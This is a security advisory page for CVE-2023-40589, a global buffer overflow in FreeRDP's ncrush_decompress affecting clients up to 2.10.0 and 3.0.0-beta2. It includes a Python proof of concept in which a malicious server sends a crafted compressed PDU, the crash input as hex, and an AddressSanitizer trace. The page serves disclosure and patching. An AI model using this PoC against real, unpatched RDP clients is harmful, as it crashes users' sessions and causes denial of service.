Security
Headlines

Headline

CVE-2023-40589: Global-Buffer-Overflow in ncrush_decompress

FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions there is a Global-Buffer-Overflow in the ncrush_decompress function. Feeding crafted input into this function can trigger the overflow which has only been shown to cause a crash. This issue has been addressed in versions 2.11.0 and 3.0.0-beta3. Users are advised to upgrade. There are no known workarounds for this issue.

Affected versions

<= 2.10.0, <= 3.0.0-beta2

Patched versions

2.11.0, 3.0.0-beta3

Summary

Global-Buffer-Overflow in ncrush_decompress

Affected

FreeRDP based clients only. FreeRDP proxy not affected as image decoding is not done by proxy (data passthrough)

PoC

async def poc(self: XRDPProcess): await asyncio.sleep(3) s = Stream.create(8192) xrdp_sec_init(self.session.rdp.sec_layer, s)

length\_p \= s.p
s.write\_uint16(0x0)  \# set later
s.write\_uint16(PDUTYPE\_DATAPDU)
s.write\_uint16(self.session.rdp.mcs\_channel)

with open(
        'crash-71ed942cc89efe9dfbca9184918d72ed681b929d',
        'rb') as f:
    xcrush\_data \= f.read()

PACKET\_COMPRESSED \= 0x20
PACKET\_COMPR\_TYPE\_RDP6 \= 0x2
s.write\_uint32(0x12345678)  \# shardId
s.write\_uint8(0x99)  \# pad1
s.write\_uint8(0x87)  \# streamId
s.write\_uint16(0x6543)  \# uncompressedLength, set later
s.write\_uint8(0x21)  \# pduType2
s.write\_uint8(PACKET\_COMPRESSED | PACKET\_COMPR\_TYPE\_RDP6)  \# compressedType
s.write\_uint16(len(xcrush\_data) + 18)  \# compressedLength
s.write(xcrush\_data)
s\_mark\_end(s)

s.p \= length\_p
s.write\_uint16(s.end \- length\_p)

xrdp\_sec\_send(self.session.rdp.sec\_layer, s, chan\=MCS\_GLOBAL\_CHANNEL)

crash-71ed942cc89efe9dfbca9184918d72ed681b929d

0000000 1db4 5d83 e45a 2e1d b5c7 f82b beb7 ffbd
0000010 002f

Impact

None

Asan

==8831==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0001062a1f7c at pc 0x000105f02eb0 bp 0x00016b35de70 sp 0x00016b35de68
READ of size 4 at 0x0001062a1f7c thread T4
#0 0x105f02eac in ncrush_decompress+0x10f8 (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#1 0x105f214e8 in bulk_decompress+0x310 (libfreerdp3.3.0.0.dylib:arm64+0x4d4e8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#2 0x106179f1c in rdp_recv_data_pdu+0x5f8 (libfreerdp3.3.0.0.dylib:arm64+0x2a5f1c) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#3 0x1061853f4 in rdp_recv_tpkt_pdu+0x9d8 (libfreerdp3.3.0.0.dylib:arm64+0x2b13f4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#4 0x1061849c4 in rdp_recv_pdu+0x34 (libfreerdp3.3.0.0.dylib:arm64+0x2b09c4) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#5 0x106180280 in rdp_recv_callback_int+0x1408 (libfreerdp3.3.0.0.dylib:arm64+0x2ac280) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#6 0x10617eda8 in rdp_recv_callback+0x1d8 (libfreerdp3.3.0.0.dylib:arm64+0x2aada8) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#7 0x1061a5508 in transport_check_fds+0x51c (libfreerdp3.3.0.0.dylib:arm64+0x2d1508) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#8 0x106180b88 in rdp_check_fds+0x170 (libfreerdp3.3.0.0.dylib:arm64+0x2acb88) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#9 0x10611b584 in freerdp_check_fds+0x1ac (libfreerdp3.3.0.0.dylib:arm64+0x247584) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#10 0x10611bc54 in freerdp_check_event_handles+0x70 (libfreerdp3.3.0.0.dylib:arm64+0x247c54) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00)
#11 0x104da3d94 in mac_client_thread+0x5a4 (MacFreeRDP:arm64+0x13d94) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#12 0x106a29630 in thread_launcher thread.c:520
#13 0x1825a7fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#14 0xa27a0001825a2d9c  (<unknown module>)

0x0001062a1f7c is located 36 bytes before global variable 'LOMBaseLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1fa0) of size 120
0x0001062a1f7c is located 4 bytes after global variable 'LOMBitsLUT' defined in '/Users/sprout/Desktop/pwn2car/FreeRDP/libfreerdp/codec/ncrush.c' (0x1062a1f00) of size 120
SUMMARY: AddressSanitizer: global-buffer-overflow (libfreerdp3.3.0.0.dylib:arm64+0x2eeac) (BuildId: 588e064ff1663fe5b0f00c326fca9f2d32000000200000000100000000000d00) in ncrush_decompress+0x10f8
Shadow bytes around the buggy address:
0x0001062a1c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a1e00: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0001062a1e80: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0001062a1f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0001062a1f80: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0001062a2000: 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0001062a2080: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
0x0001062a2100: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x0001062a2180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:           00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:       fa
Freed heap region:       fd
Stack left redzone:      f1
Stack mid redzone:       f2
Stack right redzone:     f3
Stack after return:      f5
Stack use after scope:   f8
Global redzone:          f9
Global init order:       f6
Poisoned by user:        f7
Container overflow:      fc
Array cookie:            ac
Intra object redzone:    bb
ASan internal:           fe
Left alloca redzone:     ca
Right alloca redzone:    cb
Thread T4 created by T0 here:
#0 0x106faa91c in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x4a91c) (BuildId: 4947f3677e4435f39b5765e7dbc19bf732000000200000000100000000000b00)
#1 0x106a266b0 in winpr_StartThread thread.c:568
#2 0x106a25d84 in CreateThread thread.c:650
#3 0x104da34f8 in -[MRDPView rdpStart:]+0x964 (MacFreeRDP:arm64+0x134f8) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#4 0x104da2948 in mfreerdp_client_start+0x488 (MacFreeRDP:arm64+0x12948) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#5 0x104d97b1c in freerdp_client_start+0x134 (MacFreeRDP:arm64+0x7b1c) (BuildId: 997a329d148832eb996db8b11452606f32000000200000000100000000000d00)
#6 0x104cd278c in -[AppDelegate applicationDidFinishLaunching:]+0x53c (MacFreeRDP:arm64+0x10000678c) (BuildId: f5262c7b1c22379cbcc0c60e07db60fc32000000200000000100000000000d00)
#7 0x18267b17c in **CFNOTIFICATIONCENTER_IS_CALLING_OUT_TO_AN_OBSERVER**+0x90 (CoreFoundation:arm64+0x7417c) (BuildId: 203e44018c2e3157a24b92f52551d43e32000000200000000100000000040d00)
#8 0xcf48000182716ee8  (<unknown module>)
#9 0xec26800182716e30  (<unknown module>)
#10 0xc41a80018264c4c8  (<unknown module>)
#11 0xff3c0001835aa8f0  (<unknown module>)
#12 0xb5708001858ad154  (<unknown module>)
#13 0xb94c8001858acf04  (<unknown module>)
#14 0xca1c0001858aafa0  (<unknown module>)
#15 0xf6088001858aab9c  (<unknown module>)
#16 0x333b8001835d4b60  (<unknown module>)
#17 0x40068001835d49c0  (<unknown module>)
#18 0x8d140001889ad514  (<unknown module>)
#19 0x6a218001889ace40  (<unknown module>)
#20 0xff078001889a5f14  (<unknown module>)
#21 0x975180018bedeb40  (<unknown module>)
#22 0x10650001858a6044  (<unknown module>)
#23 0x727e8001858a4edc  (<unknown module>)
#24 0x6b56800185899340  (<unknown module>)
#25 0x4925000185870790  (<unknown module>)
#26 0x8b79000104cd2020  (<unknown module>)
#27 0x18224ff24  (<unknown module>)
#28 0x1e1efffffffffffc  (<unknown module>)

Related news

Gentoo Linux Security Advisory 202401-16

Gentoo Linux Security Advisory 202401-16 - Multiple vulnerabilities have been discovered in FreeRDP, the worst of which could result in code execution. Versions greater than or equal to 2.11.0 are affected.

Ubuntu Security Notice USN-6401-1

Ubuntu Security Notice 6401-1 - It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly obtain sensitive information. It was discovered that FreeRDP did not properly manage certain inputs. A malicious server could use this issue to cause FreeRDP clients to crash, resulting in a denial of service, or possibly execute arbitrary code.

We use cookies to provide necessary website functionality, and improve your user experience. By using the website, you agree to Privacy Policy and cookies usage.